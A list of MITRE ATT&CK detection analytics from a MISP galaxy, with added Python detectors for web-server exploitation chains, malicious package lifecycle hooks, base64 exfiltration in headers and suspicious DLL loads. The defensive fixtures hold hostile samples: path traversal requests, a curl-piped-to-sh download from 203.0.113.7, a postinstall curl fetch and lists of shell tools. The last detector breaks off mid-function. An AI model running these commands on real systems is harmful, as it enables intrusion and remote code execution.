mitre_platforms ['Linux']

Analytic 0109 - AN0109

Correlate high-frequency or anomalous DNS query activity with processes that do not normally generate network requests (e.g., Office apps, system utilities). Detect pseudo-random or high-entropy domain lookups indicative of domain generation algorithms (DGAs).

Internal MISP references

UUID 7cf1b4ad-95e8-4bf0-8b2f-fc3c14938656 which can be used as unique global reference for Analytic 0109 - AN0109 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0109
mitre_platforms ['Windows']

Analytic 0019 - AN0019

Login to M365 or Google Workspace from CLI tools or unexpected source IPs, followed by mailbox or document access.

Internal MISP references

UUID c85d0aea-06c4-4b0f-8552-0d0873394ffa which can be used as unique global reference for Analytic 0019 - AN0019 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0019
mitre_platforms ['Office Suite']

Analytic 0901 - AN0901

Adversaries create SaaS accounts via admin dashboards or integrations (e.g., Zoom, Salesforce, Slack). Monitor lifecycle.create or account provisioning events from non-standard sources or times.

Internal MISP references

UUID e619c27e-3d57-489c-8ce9-cbb5f0c195bd which can be used as unique global reference for Analytic 0901 - AN0901 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0901
mitre_platforms ['SaaS']

Analytic 0202 - AN0202

Session cookie reuse on unmanaged browsers, devices, or client types deviating from user baseline (e.g., switching from Chrome to curl).

Internal MISP references

UUID 32ace35c-66c4-48d7-a8bc-d81c65f4451b which can be used as unique global reference for Analytic 0202 - AN0202 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0202
mitre_platforms ['SaaS']

Analytic 2002 - AN2002

Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service). Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure), leveraging SSL/TLS inspection for encrypted traffic. Consider correlation with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., monitor for use of files that do not normally initiate connections for the respective protocol(s)).

Internal MISP references

UUID 51133710-7c09-4eb5-a0bc-6fc5338cd68d which can be used as unique global reference for Analytic 2002 - AN2002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2002
mitre_platforms ['PRE']

Analytic 0022 - AN0022

Developer or CI invokes package managers/compilers (apt/yum + build-essential, npm/yarn/pnpm, pip/pip3, gem, cargo, go, maven/gradle). These write executable or script files into PATH or project dirs and immediately execute embedded lifecycle hooks (preinstall/postinstall, setup.py, npm scripts) that spawn shells or curl/wget, followed by egress to unfamiliar registries or domains.

Internal MISP references

UUID 9e95639e-633f-47cf-b343-3ea771c19192 which can be used as unique global reference for Analytic 0022 - AN0022 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0022
mitre_platforms ['Linux']

Analytic 0220 - AN0220

Adversary exploits Apache/Nginx/app servers. Chain: (1) suspicious requests in access logs → (2) spike of 5xx or WAF blocks → (3) web server or interpreter (apache2/nginx/php-fpm/node/python) spawns /bin/sh, curl, wget, socat, or writes webshell → (4) outbound callback.
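The four-stage chain above, as an added example that is not part of the MITRE analytic: constructed nginx/apache combined-format access log lines are joined to constructed process-create and network-connect records by a time window and by process tree. The suspicious-request patterns, window sizes and the parent/child process sets are assumptions:

```python
"""Web-server exploitation chain: suspicious requests / 5xx spike -> web
process spawns a shell -> outbound callback (added example, not MITRE's text).

All inputs are constructed: an nginx/apache combined-format access log,
process-create events and network-connect events as an EDR would export them.
Window sizes and the suspicious-request patterns are assumptions to tune."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

ACCESS_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Request patterns a WAF would also block: traversal, PHP wrappers, injected commands, PHP tags.
SUSPICIOUS = re.compile(r"(\.\./|%2e%2e|php://|;\s*(?:id|whoami|cat|curl|wget)\b|\$\{|<\?php|/bin/sh|`)", re.I)
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "php", "node", "python", "python3", "java", "ruby"}
SHELL_TOOLS = {"sh", "bash", "dash", "curl", "wget", "socat", "nc", "ncat", "perl", "python3"}

ACCESS_LOG = """\
198.51.100.23 - - [10/Oct/2025:13:54:50 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 500 312
198.51.100.23 - - [10/Oct/2025:13:54:55 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 500 312
198.51.100.23 - - [10/Oct/2025:13:55:10 +0000] "POST /index.php?page=php://input HTTP/1.1" 500 0
198.51.100.23 - - [10/Oct/2025:13:55:30 +0000] "GET /uploads/.cache.php?c=id HTTP/1.1" 200 44
192.0.2.10 - - [10/Oct/2025:13:55:33 +0000] "GET /about.html HTTP/1.1" 200 2048
""".splitlines()

PROC_EVENTS = [  # constructed
    {"ts": "2025-10-10T13:50:00+00:00", "pid": 3990, "ppid": 1, "image": "sh", "parent_image": "cron",
     "cmdline": "sh /etc/cron.hourly/logrotate"},                       # benign: a shell, but not under a web server
    {"ts": "2025-10-10T13:55:40+00:00", "pid": 4101, "ppid": 812, "image": "sh", "parent_image": "php-fpm",
     "cmdline": "sh -c curl http://203.0.113.7/x.sh|sh"},
    {"ts": "2025-10-10T13:55:41+00:00", "pid": 4102, "ppid": 4101, "image": "curl", "parent_image": "sh",
     "cmdline": "curl http://203.0.113.7/x.sh"},
]
NET_EVENTS = [  # constructed
    {"ts": "2025-10-10T13:55:42+00:00", "pid": 4102, "dst": "203.0.113.7", "dport": 80},
    {"ts": "2025-10-10T13:55:45+00:00", "pid": 2200, "dst": "192.0.2.50", "dport": 443},  # unrelated process
]


def parse_access(lines):
    out = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m:
            out.append({"ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
                        "ip": m["ip"], "path": m["path"], "status": int(m["status"])})
    return out


def descendants(root_pid, proc_events):
    """The root pid and every process below it, following ppid links."""
    children = defaultdict(list)
    for p in proc_events:
        children[p["ppid"]].append(p["pid"])
    seen, stack = {root_pid}, [root_pid]
    while stack:
        for c in children[stack.pop()]:
            if c not in seen:
                seen.add(c)
                stack.append(c)
    return seen


def find_chains(access_lines, proc_events, net_events, lookback_s=120, lookahead_s=60, min_5xx=3):
    """One record per shell/tool spawned by a web process that is preceded by
    suspicious requests or a 5xx burst, with any outbound connection made by
    that process or its descendants shortly afterwards attached as callbacks."""
    requests = parse_access(access_lines)
    chains = []
    for p in proc_events:
        if p["parent_image"] not in WEB_PARENTS or p["image"] not in SHELL_TOOLS:
            continue
        t = datetime.fromisoformat(p["ts"])
        window = [r for r in requests if t - timedelta(seconds=lookback_s) <= r["ts"] <= t]
        suspicious = [r for r in window if SUSPICIOUS.search(r["path"])]
        errors_5xx = sum(1 for r in window if 500 <= r["status"] < 600)
        if not suspicious and errors_5xx < min_5xx:
            continue
        tree = descendants(p["pid"], proc_events)
        callbacks = [f"{n['dst']}:{n['dport']}" for n in net_events
                     if n["pid"] in tree and t <= datetime.fromisoformat(n["ts"]) <= t + timedelta(seconds=lookahead_s)]
        chains.append({"pid": p["pid"], "parent": p["parent_image"], "cmdline": p["cmdline"],
                       "suspicious_requests": len(suspicious), "server_errors": errors_5xx,
                       "source_ips": sorted({r["ip"] for r in suspicious}), "callbacks": callbacks})
    return chains


if __name__ == "__main__":
    for c in find_chains(ACCESS_LOG, PROC_EVENTS, NET_EVENTS):
        print(c)
```

The shell spawned by cron is dropped by the parent check alone; the php-fpm shell is reported because three suspicious requests and three 500s precede it and its child curl reaches 203.0.113.7 within the look-ahead window. Note that the webshell hit (/uploads/.cache.php?c=id) returns 200 and matches none of the request patterns, which is why stage 3 and 4 evidence must carry the detection rather than the access log alone.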

Internal MISP references

UUID a4ce8f28-db09-4b0d-bb8d-a77ba3cef3c0 which can be used as unique global reference for Analytic 0220 - AN0220 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0220
mitre_platforms ['Linux']

Analytic 2020 - AN2020

Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID da8a7d00-6f8a-4bc6-9863-3a434c9d36c1 which can be used as unique global reference for Analytic 2020 - AN2020 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2020
mitre_platforms ['PRE']

Analytic 0032 - AN0032

Previously unseen applications generating outbound connections with atypical data flow characteristics, such as excessive data with no return response.

Internal MISP references

UUID 0519edaf-6485-40b2-8b91-13db29fb8cb8 which can be used as unique global reference for Analytic 0032 - AN0032 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0032
mitre_platforms ['macOS']

Analytic 2030 - AN2030

A process with no prior history, or outside the set of known allowlisted tools, initiates file or registry modifications to configure exclusion rules for antivirus, backup, or file-handling systems. Alternatively, the process enumerates the file system for specific file names and critical extensions (.dll, .exe, .sys), for specific directories such as 'Program Files' or security tool paths, or performs system component discovery, in order to identify the files or components to exclude.

Internal MISP references

UUID 098f0607-df17-4291-a1b1-a8e3374c075a which can be used as unique global reference for Analytic 2030 - AN2030 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2030
mitre_platforms ['Windows']

Analytic 0023 - AN0023

Developer tools (Homebrew, pip, npm/yarn, Xcode builds) install or update dependencies; new Mach-O or scripts appear under /usr/local, /opt/homebrew, ~/Library/Application Support, project dirs (node_modules/.bin, venv/bin). First run spawns sh/zsh/osascript/curl and new outbound flows; Gatekeeper/AMFI may flag unsigned components.
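One way to implement AN0022 (Linux) and AN0023 (macOS) together, as an added example that is neither MITRE's nor any package manager's code: walk process ancestry to find the package manager that (through however many sh/node generations) spawned a shell or downloader, then compare that process's egress hosts against a registry allowlist. The process records, flows, manager set and allowlist are constructed assumptions; internal mirrors must be added to the allowlist before use:

```python
"""Package-manager lifecycle hooks spawning shells/downloaders with egress to
unfamiliar hosts (added example; not part of the MITRE analytics AN0022/AN0023).

Process and flow records are constructed. The package-manager set, the
registry allowlist and the "tools of interest" set are assumptions; the
registry list in particular must be extended with any internal mirrors."""
from collections import defaultdict
import ntpath
import posixpath

PACKAGE_MANAGERS = {"npm", "npx", "yarn", "pnpm", "pip", "pip3", "gem", "cargo", "go", "mvn", "gradle", "brew"}
# Shells and downloaders that a legitimate build rarely needs to reach the network with.
TOOLS_OF_INTEREST = {"sh", "bash", "zsh", "dash", "curl", "wget", "osascript", "perl"}
REGISTRY_ALLOW = {"registry.npmjs.org", "registry.yarnpkg.com", "pypi.org", "files.pythonhosted.org",
                  "rubygems.org", "crates.io", "static.crates.io", "proxy.golang.org", "repo.maven.apache.org",
                  "github.com", "objects.githubusercontent.com", "ghcr.io", "formulae.brew.sh"}

PROCS = [  # constructed process-create records (pid, ppid, image, cmdline)
    {"pid": 500, "ppid": 1,   "image": "/bin/zsh",             "cmdline": "zsh"},
    {"pid": 501, "ppid": 500, "image": "/usr/local/bin/node",  "cmdline": "npm install"},
    {"pid": 502, "ppid": 501, "image": "/bin/sh",              "cmdline": "sh -c node postinstall.js"},  # npm runs hooks via sh -c
    {"pid": 503, "ppid": 502, "image": "/usr/local/bin/node",  "cmdline": "node postinstall.js"},
    {"pid": 504, "ppid": 503, "image": "/usr/bin/curl",        "cmdline": "curl -fsSL https://cdn.example-stage.net/p.sh"},
    {"pid": 600, "ppid": 500, "image": "/usr/bin/pip3",        "cmdline": "pip3 install requests"},
    {"pid": 601, "ppid": 600, "image": "/usr/bin/python3",     "cmdline": "python3 setup.py build_ext"},  # normal for pip
    {"pid": 700, "ppid": 500, "image": "/opt/homebrew/bin/brew", "cmdline": "brew install jq"},
    {"pid": 701, "ppid": 700, "image": "/usr/bin/curl",        "cmdline": "curl -q -f https://ghcr.io/v2/homebrew/core/jq/blobs/sha256:abc"},
]
FLOWS = [  # constructed outbound flows (pid, destination host)
    {"pid": 504, "host": "cdn.example-stage.net", "dport": 443},
    {"pid": 600, "host": "pypi.org", "dport": 443},
    {"pid": 701, "host": "ghcr.io", "dport": 443},
]


def basename(path: str) -> str:
    """Works for both / and \\ separated paths."""
    return ntpath.basename(posixpath.basename(path))


def manager_of(proc):
    """npm/yarn run as 'node' with the manager as the first cmdline token, so check both."""
    candidates = {basename(proc["image"])}
    if proc["cmdline"]:
        candidates.add(basename(proc["cmdline"].split()[0]))
    hit = candidates & PACKAGE_MANAGERS
    return sorted(hit)[0] if hit else None


def ancestry(pid, by_pid, max_depth=32):
    """Yield ancestor records, nearest first; depth-bounded so ppid loops cannot hang."""
    seen = set()
    p = by_pid.get(pid)
    while p and p["ppid"] in by_pid and p["ppid"] not in seen and len(seen) < max_depth:
        seen.add(p["ppid"])
        p = by_pid[p["ppid"]]
        yield p


def detect(procs, flows, allow=REGISTRY_ALLOW):
    """Shells/downloaders under a package manager; 'high' when they reach a host
    outside the registry allowlist, 'low' (hook executed, nothing unusual) otherwise."""
    by_pid = {p["pid"]: p for p in procs}
    flows_by_pid = defaultdict(list)
    for f in flows:
        flows_by_pid[f["pid"]].append(f["host"])

    findings = []
    for p in procs:
        if basename(p["image"]) not in TOOLS_OF_INTEREST:
            continue
        manager = next((m for m in (manager_of(a) for a in ancestry(p["pid"], by_pid)) if m), None)
        if not manager:
            continue
        unknown_hosts = sorted(h for h in flows_by_pid[p["pid"]] if h not in allow)
        findings.append({"pid": p["pid"], "tool": basename(p["image"]), "manager": manager,
                         "cmdline": p["cmdline"], "hosts": unknown_hosts,
                         "severity": "high" if unknown_hosts else "low"})
    return findings


if __name__ == "__main__":
    for f in detect(PROCS, FLOWS):
        print(f)
```

The ancestry walk is what makes this usable: npm's postinstall reaches curl only through sh and a second node process, so a direct parent check on curl would never see npm. The brew-spawned curl to ghcr.io lands at low severity, which is the expected noise level for a working developer machine; the pip-spawned python3 is not a tool of interest at all.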

Internal MISP references

UUID 0f186e7f-fe33-45d6-ba1e-02a334cf1cb3 which can be used as unique global reference for Analytic 0023 - AN0023 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0023
mitre_platforms ['macOS']

Analytic 0203 - AN0203

Web session tokens reused in native Office apps (e.g., Outlook, Teams) without associated token refresh or login behavior on the endpoint.

Internal MISP references

UUID 126cff4b-4ba7-4464-bfc8-4daabed5e05b which can be used as unique global reference for Analytic 0203 - AN0203 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0203
mitre_platforms ['Office Suite']

Analytic 2003 - AN2003

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)

Internal MISP references

UUID 8ad0cc97-4f6e-4ea0-a930-3fdb6b0df819 which can be used as unique global reference for Analytic 2003 - AN2003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2003
mitre_platforms ['PRE']

Analytic 0230 - AN0230

Adversary leverages root or sudo access to alter system banners, web content directories (e.g., /var/www/html), or login configurations (/etc/issue). File creation or overwrites may coincide with suspicious script execution or cron job activity.

Internal MISP references

UUID 8ba0c3e2-9544-47d1-9738-757c35dc19fa which can be used as unique global reference for Analytic 0230 - AN0230 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0230
mitre_platforms ['Linux']

Analytic 0320 - AN0320

Inbound spearphishing attempts delivered via third-party services (e.g., Gmail, LinkedIn messages) leading to malicious file downloads or browser-initiated script execution. Defender view includes correlation of external service logins, unexpected file write operations, and suspicious descendant processes spawned from productivity or browser applications.

Internal MISP references

UUID c83f1d8c-ba54-4f2d-91b8-3006a2180497 which can be used as unique global reference for Analytic 0320 - AN0320 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0320
mitre_platforms ['Windows']

Analytic 0302 - AN0302

Atypical processes (e.g., powershell.exe, regsvr32.exe) encode large outbound traffic using Base64 or other character encodings; this traffic is sent over uncommon ports or embedded in protocol fields (e.g., HTTP cookies or headers).
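An added example (not part of the MITRE analytic) of scoring base64-looking header and cookie values by process, destination port, decoded size and decoded entropy. Requests are constructed as a proxy or EDR might export them; the process baseline, port list and weights are assumptions. The mail client carrying a JWT shows why the process baseline matters: legitimate tokens are base64 too.

```python
"""Base64-encoded data in HTTP headers/cookies from atypical processes
(added example; not part of the MITRE analytic). Requests are constructed as
a proxy or EDR might export them; the process baseline, port list and score
thresholds are assumptions."""
import base64
import binascii
import math
import re
from collections import Counter

BROWSER_BASELINE = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "teams.exe"}
COMMON_WEB_PORTS = {80, 443, 8080}
TOKEN_RE = re.compile(r"[A-Za-z0-9+/_-]{32,}={0,2}")

# Stand-in for an encrypted/compressed blob: every byte value 3 times -> entropy 8.0 bits.
_BLOB_B64 = base64.b64encode(bytes(range(256)) * 3).decode()
_SESSION_B64 = base64.b64encode(b"session-id-for-alice-0001-abcd!!").decode()   # 32 bytes, low entropy

REQUESTS = [  # constructed
    {"process": "chrome.exe", "dport": 443, "headers": {"Cookie": f"sid={_SESSION_B64}; theme=dark"}},
    {"process": "powershell.exe", "dport": 443, "headers": {"Cookie": f"__utm={_BLOB_B64}"}},
    {"process": "regsvr32.exe", "dport": 8443, "headers": {"X-Session": _BLOB_B64}},
    {"process": "outlook.exe", "dport": 443,
     "headers": {"Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.sig"}},
]


def byte_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def try_b64decode(token: str):
    """Strict decode of standard or URL-safe base64; None if it is not valid base64."""
    t = token.replace("-", "+").replace("_", "/")
    t += "=" * (-len(t) % 4)
    try:
        return base64.b64decode(t, validate=True)
    except (binascii.Error, ValueError):
        return None


def score_request(req, min_blob=256, min_entropy=7.0):
    """Points: process not a browser/mail client (+2), non-standard port (+1),
    decoded payload >= min_blob bytes (+1), decoded entropy >= min_entropy (+1).
    Returns (score, details of the largest decodable token) or (0, None)."""
    best = None
    for name, value in req["headers"].items():
        for tok in TOKEN_RE.findall(value):
            raw = try_b64decode(tok)
            if raw is not None and (best is None or len(raw) > best["decoded_bytes"]):
                best = {"header": name, "token_chars": len(tok), "decoded_bytes": len(raw),
                        "entropy": round(byte_entropy(raw), 2)}
    if best is None:
        return 0, None
    score = 0
    if req["process"].lower() not in BROWSER_BASELINE:
        score += 2
    if req["dport"] not in COMMON_WEB_PORTS:
        score += 1
    if best["decoded_bytes"] >= min_blob:
        score += 1
    if best["entropy"] >= min_entropy:
        score += 1
    return score, best


def scan(requests, alert_at=3):
    findings = []
    for req in requests:
        score, best = score_request(req)
        if score >= alert_at:
            findings.append({"process": req["process"], "dport": req["dport"], "score": score, **best})
    return findings


if __name__ == "__main__":
    for f in scan(REQUESTS):
        print(f)
```

Strict decoding (validate=True) matters: a long hex or random-word string would otherwise be accepted by the lenient decoder and inflate the count. The JWT in the Authorization header never even reaches the scorer because its dot-separated segments are shorter than the 32-character minimum.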

Internal MISP references

UUID f979bacd-580c-4948-b501-c42dd4a8cb92 which can be used as unique global reference for Analytic 0302 - AN0302 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0302
mitre_platforms ['Windows']

Analytic 2004 - AN2004

Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time. Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.

Internal MISP references

UUID 2a3b0030-05b4-4b85-a33c-dda07472f31f which can be used as unique global reference for Analytic 2004 - AN2004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2004
mitre_platforms ['PRE']

Analytic 0042 - AN0042

Detects files collected into user temp or shared directories followed by compression with ditto, zip, or custom scripts.

Internal MISP references

UUID 313de6ca-629b-4f77-b58f-5cf7b490a62e which can be used as unique global reference for Analytic 0042 - AN0042 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0042
mitre_platforms ['macOS']

Analytic 0402 - AN0402

Launchd jobs or user processes invoking symmetric crypto APIs from the Security framework and generating outbound connections carrying randomized payloads inconsistent with normal TLS patterns.

Internal MISP references

UUID 531ba452-e3b8-4064-be28-31ddd13b3478 which can be used as unique global reference for Analytic 0402 - AN0402 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0402
mitre_platforms ['macOS']

Analytic 0420 - AN0420

Forged SAML tokens may be used on Windows systems to authenticate to federated apps without normal Kerberos activity. Defenders may detect anomalous event correlation, where access to SaaS/O365 via SAML occurs without prior TGT requests or user logons.

Internal MISP references

UUID 5d2820b1-af59-4ca2-9f9e-b5bc76f55395 which can be used as unique global reference for Analytic 0420 - AN0420 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0420
mitre_platforms ['Windows']

Analytic 0024 - AN0024

Correlates unexpected modifications to WMI event filters, scheduled task triggers, or registry autorun keys with subsequent execution of non-standard binaries by SYSTEM-level processes.

Internal MISP references

UUID 9418d7e2-666f-4f73-9ac7-96b32005e9b7 which can be used as unique global reference for Analytic 0024 - AN0024 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0024
mitre_platforms ['Windows']

Analytic 0204 - AN0204

Anomalous process (e.g., rundll32, svchost, cmd) initiates connections to internal peer hosts not seen in typical communication baselines, used to proxy or forward traffic internally, often using SMB, RPC, or high ports.

Internal MISP references

UUID ca56c2df-0338-4325-964a-0f775d986277 which can be used as unique global reference for Analytic 0204 - AN0204 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0204
mitre_platforms ['Windows']

Analytic 0240 - AN0240

Defender observes execution of commands like tasklist, sc query, reg query, or PowerShell WMI/Registry queries targeting known backup products (e.g., Veeam, Acronis, CrashPlan). Behavior often includes parent-child lineage involving PowerShell or cmd.exe with discovery syntax, and enumeration of services, directories, or registry paths tied to backup software.

Internal MISP references

UUID dbc6d9ca-9502-46a0-a59b-15b050bb539c which can be used as unique global reference for Analytic 0240 - AN0240 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0240
mitre_platforms ['Windows']

Analytic 2005 - AN2005

Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., monitor for use of files that do not normally initiate connections for the respective protocol(s)). Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).

Internal MISP references

UUID 2eb3d192-6e04-4e42-af63-ed3f54f65285 which can be used as unique global reference for Analytic 2005 - AN2005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2005
mitre_platforms ['PRE']

Analytic 0520 - AN0520

Monitors sequences involving deletion/modification of logs, registry keys, scheduled tasks, or prefetch files following suspicious process activity or elevated access escalation.

Internal MISP references

UUID 4416c78b-902b-4baa-9a5d-26f0b7e5d78d which can be used as unique global reference for Analytic 0520 - AN0520 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0520
mitre_platforms ['Windows']

Analytic 0250 - AN0250

Behavioral chain involving suspicious use of GetProcAddress and LoadLibrary following memory allocation and manual mapping, often paired with low entropy strings, abnormal API use without static import tables, or delayed module load behaviors.

Internal MISP references

UUID 48a818ac-077b-46ff-b615-bb2958536aef which can be used as unique global reference for Analytic 0250 - AN0250 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0250
mitre_platforms ['Windows']

Analytic 0502 - AN0502

Adversary uses a tool like Ruler to configure a malicious Outlook folder Home Page that loads a remote or embedded HTML payload upon folder interaction. Execution chain begins with Outlook launching, a specific folder being accessed, and a suspicious child process being spawned or COM-based execution invoked.

Internal MISP references

UUID 5ce49e4b-a67f-46ea-b48d-f08f7b942fb4 which can be used as unique global reference for Analytic 0502 - AN0502 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0502
mitre_platforms ['Windows']

Analytic 0205 - AN0205

socat, ssh, iptables, or ncat invoked from user space or cron jobs to create port forwarding, reverse shells, or inter-host tunnels between compromised Linux systems. Behavior is typically paired with socket activity and high entropy traffic.

Internal MISP references

UUID 7f269271-6800-4d20-b9f7-6c38cecac6f0 which can be used as unique global reference for Analytic 0205 - AN0205 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0205
mitre_platforms ['Linux']

Analytic 0025 - AN0025

Detects inotify or auditd configuration changes that monitor system files coupled with execution of script interpreters or binaries by cron or systemd timers.

Internal MISP references

UUID 92d182e9-6723-43e4-9eab-f00aa6d53153 which can be used as unique global reference for Analytic 0025 - AN0025 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0025
mitre_platforms ['Linux']

Analytic 0052 - AN0052

A process (often LOLBin or user-launched program) loads a DLL from a user-writable/UNC/Temp path or unsigned/invalid signer. Within a short window the DLL is (a) newly written to disk, (b) spawned as follow-on execution (rundll32/regsvr32), or (c) establishes outbound C2.
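The path-class, signature and time-window correlation described above, as an added example (not MITRE's code) run over constructed Sysmon-like ImageLoad, FileCreate, ProcessCreate and NetworkConnect records. The path markers, the weights and the 300-second window are assumptions:

```python
"""DLL loaded from a user-writable/UNC/Temp path or unsigned, with follow-on
activity in a short window (added example; not part of the MITRE analytic).

Events are constructed to resemble Sysmon ImageLoad (7), FileCreate (11),
ProcessCreate (1) and NetworkConnect (3) records. Path classes, weights and
the window are assumptions."""
import ntpath
from datetime import datetime, timedelta

TEMP_PUBLIC_MARKERS = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\windows\\temp\\", "\\programdata\\")
LOADER_LOLBINS = {"rundll32.exe", "regsvr32.exe"}

EVENTS = [  # constructed; timestamps ISO-8601
    {"ts": "2025-10-10T10:00:00", "type": "FileCreate", "pid": 3312,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target": "C:\\Users\\alice\\AppData\\Local\\Temp\\version.dll"},
    {"ts": "2025-10-10T10:00:06", "type": "ImageLoad", "pid": 4420, "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\OneDriveUpd.exe",
     "loaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\version.dll", "signed": False, "signature_status": "Unavailable"},
    {"ts": "2025-10-10T10:00:06", "type": "ImageLoad", "pid": 4420, "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\OneDriveUpd.exe",
     "loaded": "C:\\Windows\\System32\\kernel32.dll", "signed": True, "signature_status": "Valid"},
    {"ts": "2025-10-10T10:00:08", "type": "NetworkConnect", "pid": 4420, "dst": "198.51.100.77", "dport": 443},
    {"ts": "2025-10-10T10:10:00", "type": "FileCreate", "pid": 6000,
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "target": "C:\\Users\\Public\\update.dll"},
    {"ts": "2025-10-10T10:10:02", "type": "ProcessCreate", "pid": 6100, "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\Public\\update.dll,Start"},
    {"ts": "2025-10-10T10:10:03", "type": "ImageLoad", "pid": 6100, "image": "C:\\Windows\\System32\\rundll32.exe",
     "loaded": "C:\\Users\\Public\\update.dll", "signed": False, "signature_status": "Unavailable"},
    {"ts": "2025-10-10T09:30:00", "type": "ImageLoad", "pid": 2100, "image": "C:\\Program Files\\Vendor\\app.exe",
     "loaded": "C:\\Program Files\\Vendor\\helper.dll", "signed": True, "signature_status": "Valid"},
    {"ts": "2025-10-10T10:05:00", "type": "ImageLoad", "pid": 5010, "image": "C:\\Users\\bob\\AppData\\Local\\Programs\\Editor\\editor.exe",
     "loaded": "C:\\Users\\bob\\AppData\\Local\\Programs\\Editor\\libgit.dll", "signed": True, "signature_status": "Valid"},
]


def norm(p: str) -> str:
    return p.lower().replace("/", "\\")


def path_flags(path: str):
    """'user_writable_path' for anything under a profile, Temp, Public, ProgramData or UNC;
    'temp_public_or_unc' additionally for the drop locations attackers favour."""
    p = norm(path)
    unc = p.startswith("\\\\")
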